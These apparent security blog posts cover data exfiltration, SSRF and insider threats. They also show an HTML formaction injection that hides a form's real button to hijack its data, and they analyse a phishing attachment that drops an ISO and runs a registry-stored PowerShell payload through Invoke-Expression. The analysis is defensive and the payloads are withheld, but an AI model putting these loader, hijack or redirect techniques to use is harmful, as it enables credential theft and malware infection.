“Data exfiltration is the unauthorized transfer of sensitive information from a target’s network to a location which a threat actor controls”[02]. For national security bodies and organizations, the worst scenario is when attackers not only steal data (cyber-espionage) but also modify them, which amounts to cyber-sabotage.

The leakage of sensitive information from a protected network to an external network could seriously damage an organization in terms of reputation, lost revenue and legal consequences. For example:

  • National Security: the theft of classified documents may endanger national security;
  • Organizations: proprietary information can be sold to a rival company, causing a loss of competitive advantage;
  • Citizens: the spreading of sensitive personal data could have serious privacy and security implications, such as identity theft through an account takeover (ATO) attack.

Sensitive proprietary digital information could be contained in:

  • static content: files, images, texts, spreadsheets, phone books, agendas, etc.;
  • dynamic content: multimedia sessions, telephone conversations, video conferences, chat channels (text, video, image).

The leakage can happen in several ways:

- the data are exfiltrated without altering the original files;
- the data are modified: converted to a new file format or encrypted;
- the data are hidden using steganography techniques;
- the data are exfiltrated using a combination of the aforementioned techniques.



SSRF (Server-Side Request Forgery) is an external attack which lets an attacker send crafted requests from the back-end server of a vulnerable web application. Attackers commonly use SSRF to target internal networks that sit behind firewalls and cannot be reached from the external network.




SSRF - Server Side Request Forgery Schema


It is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. Furthermore, it could:

✔ leak sensitive data such as authorization credentials;
✔ even allow an attacker to perform arbitrary command execution.
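One common way to reduce the SSRF risk described above is to validate every user-supplied URL before the server fetches it. The following is only a minimal sketch under stated assumptions: the function names, the allowlist and the host `api.example.com` are hypothetical and do not come from any real application.

```javascript
// Hypothetical allowlist of hosts the back-end is permitted to contact.
const ALLOWED_HOSTS = new Set(["api.example.com"]);

// Returns true for IPv4 literals in private, loopback or link-local ranges.
function isPrivateIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false;
  const a = Number(m[1]);
  const b = Number(m[2]);
  return (
    a === 0 ||
    a === 10 ||                          // 10.0.0.0/8
    a === 127 ||                         // loopback
    (a === 172 && b >= 16 && b <= 31) || // 172.16.0.0/12
    (a === 192 && b === 168) ||          // 192.168.0.0/16
    (a === 169 && b === 254)             // link-local range
  );
}

// Decides whether the server may issue a request to rawUrl.
function isRequestAllowed(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch {
    return false; // not a parseable absolute URL
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  if (isPrivateIPv4(url.hostname)) return false;
  return ALLOWED_HOSTS.has(url.hostname);
}

console.log(isRequestAllowed("https://api.example.com/v1/items")); // true
console.log(isRequestAllowed("http://192.168.1.10/admin"));        // false
```

A check like this looks only at the URL text. A host name that resolves to an internal address would still pass the private-range test, so a real deployment would also have to verify the resolved address; the allowlist is what actually blocks unknown hosts in this sketch.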



An attacker can export users’ sensitive data using an “HTML form injection attack”. Here is an example that uses the formaction attribute. According to the HTML 5 specification, when it is set on a submit button it overrides the action attribute of the parent form by specifying the URL that will process the form data when the form is submitted through that button.

Let us consider the following normal form in an HTML page:

<form action="URL" ... >

list of (label, data-box) pairs

<button type="submit" ... > label </button>

</form>


We inject a formaction attribute:

<form action="URL" ... >

list of (label, data-box) pairs

<button type="submit" formaction="BAD URL"> Fake Search! </button>

</form>


The injected form sends its form-data to BAD URL instead of URL.
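A defender can look for this kind of injection by auditing the served HTML for formaction attributes that point to a different origin. The sketch below is an illustration only: the function names and the example URLs are hypothetical, and a regular expression is merely a rough approximation of real HTML parsing.

```javascript
// Lists the values of all formaction attributes on <button> and <input> tags.
function findFormactions(html) {
  const pattern =
    /<(?:button|input)\b[^>]*\bformaction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const values = [];
  for (const match of html.matchAll(pattern)) {
    // Exactly one of the three groups is set, depending on the quoting style.
    values.push(match[1] ?? match[2] ?? match[3]);
  }
  return values;
}

// Keeps only the formaction targets whose origin differs from the page origin.
function findCrossOriginFormactions(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  return findFormactions(html).filter((value) => {
    try {
      return new URL(value, pageUrl).origin !== pageOrigin;
    } catch {
      return true; // unparseable target: report it for manual review
    }
  });
}

const sampleHtml =
  '<form action="/search" method="post">' +
  '<button type="submit" formaction="/advanced">More</button>' +
  '<button type="submit" formaction="https://attacker.example/collect">Fake Search!</button>' +
  "</form>";

console.log(findCrossOriginFormactions(sampleHtml, "https://shop.example/search"));
// [ 'https://attacker.example/collect' ]
```

Relative targets such as /advanced resolve to the page's own origin and are not reported, so only the button that would send the form data elsewhere stands out.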



In this type of attack we use the formaction attribute, which is supported by all major browsers. It specifies where to send the form data when the form is submitted, overriding the form's action attribute. Consider the following HTML code:

<h1>AUTHENTICATION System</h1>

<div align="left">

<form action="/action.php" method="get">

<label for="iPSW">My Password:</label>
<input type="text" id="iPSW" name="nPSW"><br><br>

<button type="submit">Submit Password</button>

<button type="submit" formaction="/form_action.php">Submit Password to another page</button>

</form>

</div>





Clicking Submit Password sends the form data to /action.php, whereas clicking Submit Password to another page sends them to /form_action.php.


The following HTML:


<form name="fsbycode" class="s4form" action="" method="post">

<h2>Search Guest By Numeric Code</h2>

Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode" autofocus placeholder="Insert Code Number" >

<input class="SButton" type="submit" value="Search!">



It produces this form in the web browser:


Normal Web Form

An attack on the web server can produce the following abused HTML:

<form name="fsbycode" class="s4form" action="" method="post">

<h2>Search Guest By Numeric Code</h2>

Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode"
autofocus placeholder="Insert Code Number" >

<!-- BEGIN attacker's code -->
      <button type="submit" formaction=""> Fake Search! </button>
      <style> .SButton {visibility:hidden;} </style>
<!-- END attacker's code -->

<input class="SButton" type="submit" value="Search!">


As the above code shows, the legitimate submit button is hidden by the injected style rule applied to the class .SButton: <style> .SButton {visibility:hidden;} </style>. The user therefore sees only the attacker's Fake Search! button.

The previous HTML is displayed in the browser as follows:

Abused Web Form

Clicking the Fake Search! button produces the following HTTP request:

Proxy-Connection: keep-alive
Content-Length: 16
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4,he;q=0.2


This shows how the data are sent to the illegitimate web site "" instead of the legitimate one (the web sites are used only to demonstrate how the attack scheme works).



An insider attack is carried out by a trusted individual with legitimate access to the organization's network and system resources. Compared to external threats, insider threats are more dangerous and more difficult to detect and prevent.

If the insider uses the protected network to exfiltrate sensitive information, several types of communication channel are available:

  • overt communication: preserving privacy by using encryption;
  • tunnelled communication: over an authorized overt channel;
  • covert communication: using steganography techniques to cloak the content.




To face this serious problem, the security system of an ICT infrastructure must be equipped with mechanisms for prevention, detection, damage limitation and monitoring.

To lower the risk of attacks, unauthorized communication channels should be blocked so that compromised applications cannot exfiltrate data outside the organization.

We need a system that detects when a web site is compromised, so that we can react promptly to the attack.
A Sensitive Information Dissemination Detection (SIDD) system is one mechanism for stopping the leakage of sensitive information in time. It monitors the outbound traffic from the protected network and takes action in response to suspicious traffic.
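To give an idea of what monitoring outbound traffic can look like, here is a deliberately simple heuristic. It is not the SIDD algorithm: it only measures the Shannon entropy of an outbound payload, on the assumption that encrypted or compressed data look close to random. The function names and the threshold value are hypothetical.

```javascript
// Shannon entropy of a byte sequence, in bits per byte (between 0 and 8).
function shannonEntropy(bytes) {
  if (bytes.length === 0) return 0;
  const counts = new Array(256).fill(0);
  for (const b of bytes) counts[b]++;
  let entropy = 0;
  for (const c of counts) {
    if (c === 0) continue;
    const p = c / bytes.length;
    entropy -= p * Math.log2(p);
  }
  return entropy;
}

// Hypothetical cut-off: payloads above it are flagged for closer inspection.
const ENTROPY_THRESHOLD = 7.5;

function looksSuspicious(payload) {
  return shannonEntropy(payload) > ENTROPY_THRESHOLD;
}

// Plain text has low entropy, so it is not flagged by this heuristic.
console.log(looksSuspicious(Buffer.from("hello hello hello hello"))); // false
```

High entropy alone proves nothing, since legitimate HTTPS traffic and compressed files are also close to random. A heuristic of this kind would only be one signal among several in a real detection system.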

While the attack is in progress, we have to limit the damage by closing any compromised channels.
After the attack has been detected, the following must be done to minimize further information leakage:

1) analyze which vulnerability was exploited and whether it is structural to the system;
2) harden the security of the information system to prevent another attack of the same type.

Even if the security system does not detect any problems, it is highly recommended to run random in-depth security checks, because an information leak could have happened stealthily.



  1. Eric Y. Chen, Sergey Gorbaty, Astha Singhal and Collin Jackson, Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control, Carnegie Mellon University;
  3. Yali Liu, Cherita Corbett, Ken Chiang, Rennie Archibald, Biswanath Mukherjee and Dipak Ghosal, SIDD: A Framework for Detecting Sensitive Data Exfiltration by Insider Attack, University of California, USA;
  4. Server-Side Request Forgery (SSRF).

Last update on 19/03/2022

Everyone knows by now that you have to be very careful when surfing the internet. A little carelessness can cost you a lot and can lead to the loss of data and information, which are the most precious intangible assets today. Since 72% of attacks on organizations were reported to arrive through email, in this post I warn again about HTML files received as email attachments. They seem harmless, but on closer inspection they hide a thousand pitfalls and dangers.

At the application level, a device interacts with cyberspace mainly through a mail client and a web browser.

To demonstrate this, I am going to examine, as far as possible, an HTML file received as an attachment. It is named “Covid_information.html”.

Parallel use of many attack techniques: Spear Phishing, Malicious code in an HTML file and Web browser vulnerabilities

The JavaScript code inside “Covid_information.html” is the following one.


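  // Malicious payload (content not reproduced here)
  text = "a base-64 encoded long string of 1622 KB";

  function download(data, filename, type) {
    // Wrap the decoded bytes in a Blob of the given MIME type
    var file = new Blob([data], {type: type});
    if (window.navigator.msSaveOrOpenBlob)
        // Legacy Internet Explorer path
        window.navigator.msSaveOrOpenBlob(file, filename);
    else {
        // Other browsers: build a hyperlink on the fly that points to the Blob
        var a = document.createElement("a"),
                url = URL.createObjectURL(file);
        a.href = url;
        a.download = filename;
        // (the statements that trigger the link are missing from this listing)
        setTimeout(function() {
            // (the clean-up statements are missing from this listing)
        }, 0);
    }
  }

  // Decode the base-64 payload and copy it, byte by byte, into a typed array
  bt = atob(text);
  bN = new Array(bt.length);
  for (var i = 0; i < bt.length; i++) {
    bN[i] = bt.charCodeAt(i);
  }
  bA = new Uint8Array(bN);
  // (the call that passes bA to download() is missing from this listing)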


The first statement assigns to the variable “text” a base-64 encoded string of 1622 KB. This is the malicious payload, which we will look at later.

Then the function “download”:

  1. creates a hyperlink on the fly;
  2. links it to a file created from the content of the data variable;
  3. downloads this file.

The next statement decodes the base-64 content of “text” using the atob() function.

Each character of the decoded string is then converted to its numeric code with the charCodeAt() function, which yields the byte values of the file. At the end, the file named "Covid.iso" is downloaded to local storage.
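The decoding step described above can be reproduced safely on a harmless string. The sketch below assumes an environment where atob() and btoa() are available as globals (browsers and recent Node.js versions); the function name base64ToBytes is my own and does not appear in the attachment.

```javascript
// Converts a base-64 string into the bytes it encodes,
// using the same atob() + charCodeAt() approach as the attachment.
function base64ToBytes(b64) {
  const binary = atob(b64); // one character per decoded byte
  const bytes = new Uint8Array(binary.length);
  for (let i = 0; i < binary.length; i++) {
    bytes[i] = binary.charCodeAt(i); // code unit 0..255 is the byte value
  }
  return bytes;
}

// Harmless demonstration: encode a short text, then decode it back to bytes.
const demoBytes = base64ToBytes(btoa("Hi!"));
console.log(Array.from(demoBytes)); // [ 72, 105, 33 ]
```

Nothing in this conversion is malicious in itself. What makes the attachment dangerous is that the resulting bytes are written to disk as a file without any request to a server, so the payload never appears as a separate download that a network filter could inspect.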

A look at the Covid.iso file.

The file Covid.iso encapsulates an HTML file with the following JavaScript code:

    <script language="javascript">
    // Windows Script Host shell object: gives access to the registry and to process launching
    var a = new ActiveXObject('Wscript.Shell');
    function start() {
        // Store the content of p1 and p2 in two registry values
        res = document.getElementById("p1").innerHTML;
        a.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\JavaSoft\\Ver", res, "REG_SZ");
        res = document.getElementById("p2").innerHTML;
        a.RegWrite("HKEY_CURRENT_USER\\SOFTWARE\\JavaSoft\\Ver2", res, "REG_SZ");
        // Reassemble the command line from the fragments c1..c5
        res = document.getElementById("c1").innerHTML;
        res += document.getElementById("c2").innerHTML;
        res += document.getElementById("c3").innerHTML;
        res += document.getElementById("c4").innerHTML;
        res += document.getElementById("c5").innerHTML;
        // Run the assembled command in a hidden window (window style 0)
        a.Run(res, 0);
    }
    </script>

What is crucial in this code is the content of the DOM elements embedded in the HTML file, namely p1, p2, c1, c2, c3, c4 and c5.

These elements provide a kind of obfuscation: they are assembled at run time in order to execute code on the host machine.

p1 = (“a base-64 encoded long string”) containing a binary.

p2 = (“a base-64 encoded long string”) containing code:


c2=hell -C Invo

c3=ke-Expression (g

c4=p HKCU:\\SO


The final command is:

powershell -C Invoke-Expression (gp HKCU:\\SOFTWARE\\JavaSoft).Ver

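The Invoke-Expression cmdlet runs a string as a command on the local computer. Here gp (an alias of Get-ItemProperty) reads the value Ver from the registry key written by the script, so whatever was stored there is executed.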
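Why split the command into fragments at all? A minimal sketch, using only the three fragments c2, c3 and c4 listed above, shows that a naive keyword search finds nothing in any single fragment and matches only once the pieces are joined. The function matchesSignature and the choice of keyword are my own assumptions, not the logic of any real scanner.

```javascript
// The three fragments shown in the analysis (c2, c3 and c4), copied verbatim.
const fragments = [
  "hell -C Invo",
  "ke-Expression (g",
  String.raw`p HKCU:\\SO`,
];

// Naive, case-insensitive keyword match standing in for a static signature.
function matchesSignature(text, signature) {
  return text.toLowerCase().includes(signature.toLowerCase());
}

const signature = "Invoke-Expression";

// No single fragment contains the keyword...
const hitInAnyFragment = fragments.some((f) => matchesSignature(f, signature));
// ...but the reassembled string does.
const hitAfterJoin = matchesSignature(fragments.join(""), signature);

console.log(hitInAnyFragment); // false
console.log(hitAfterJoin);     // true
```

This is why an analysis has to follow what the script does with the DOM elements rather than inspect each element on its own.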

Even if the above analysis is not complete, it demonstrates a high level of sophistication, which points to authors with considerable know-how.

So beware of attachments in HTML format!


Email attachments are one of the main vectors of malicious code. According to an analysis by the Helsinki-based security provider F-Secure, 85% of all malicious emails have a .DOC, .XLS, .PDF, .ZIP, or .7Z file attached.

But now, in addition to these, we have to consider another type of dangerous attachment: .HTML.

When we receive an email with an .HTML attachment, we have to be very careful and not open it. The .HTML file could contain, for example, dangerous JavaScript code such as:

<body onpageshow="document.location.replace(window.atob('a base-64 encoded string'));">


<frameset onpageshow="document.location.replace(window.atob('a base-64 encoded string'));"> 

The onpageshow event is used because it occurs every time the page is shown, whereas the onload event occurs only when the page first loads and does not occur when the page is loaded from the cache.

document.location.replace(newURL) replaces the current document with a new one.

The atob() method decodes a string that was base-64 encoded, for example by the btoa() method. The base-64 string obfuscates the URL it represents.

In the second code snippet we can notice the use of the <frameset> tag, which is deprecated and not supported in HTML5. Nevertheless, some browsers might still support it for compatibility purposes.

The problem is that the JavaScript code inside the HTML page can load any URL, and only by decoding the “base-64 encoded string” can you know which web page it is. The base-64 string is decoded dynamically by the atob() function when the page is shown in the web browser. So, once you have opened the file, it is already too late if the web page is malicious.
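The hidden URL can be recovered without ever opening the attachment in a browser, by treating the file as plain text and decoding the atob() arguments offline. What follows is a minimal sketch for Node.js; the function name extractAtobTargets and the sample URL are hypothetical, and the regular expression only covers the simple case of a literal string passed to atob().

```javascript
// Finds literal atob('...') / atob("...") calls in the text of an HTML file
// and returns the decoded strings. Nothing in the file is executed.
function extractAtobTargets(html) {
  const pattern = /atob\(\s*(['"])([A-Za-z0-9+\/=\s]+)\1\s*\)/g;
  const decoded = [];
  for (const match of html.matchAll(pattern)) {
    decoded.push(Buffer.from(match[2], "base64").toString("utf8"));
  }
  return decoded;
}

// Build a harmless sample that mimics the structure of the attachment.
const hiddenUrl = "https://example.com/landing";
const encodedUrl = Buffer.from(hiddenUrl, "utf8").toString("base64");
const attachmentText =
  `<body onpageshow="document.location.replace(window.atob('${encodedUrl}'));">`;

console.log(extractAtobTargets(attachmentText));
// [ 'https://example.com/landing' ]
```

In practice the attachment would be read from disk as text, for instance with fs.readFileSync, and passed to the same function. Attackers can of course build the string dynamically to defeat such a simple pattern, so an empty result does not mean the file is safe.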

With malicious code in a web page we can have:

  • Malicious Ads: advertisements on the Web that infect the user's machine with malware in order to make the compromised machine a member of a botnet.
  • A Malware Distribution Network (MDN): a collection of landing pages, malware repository servers and standard redirection pages. The goal of an MDN is to redirect the victim from a landing page to a malware repository server.
  • Drive-by Downloads: the automatic download of software to a user's device, without the user's knowledge or consent.

Here is how an antivirus reacted when it scanned this type of HTML attachment: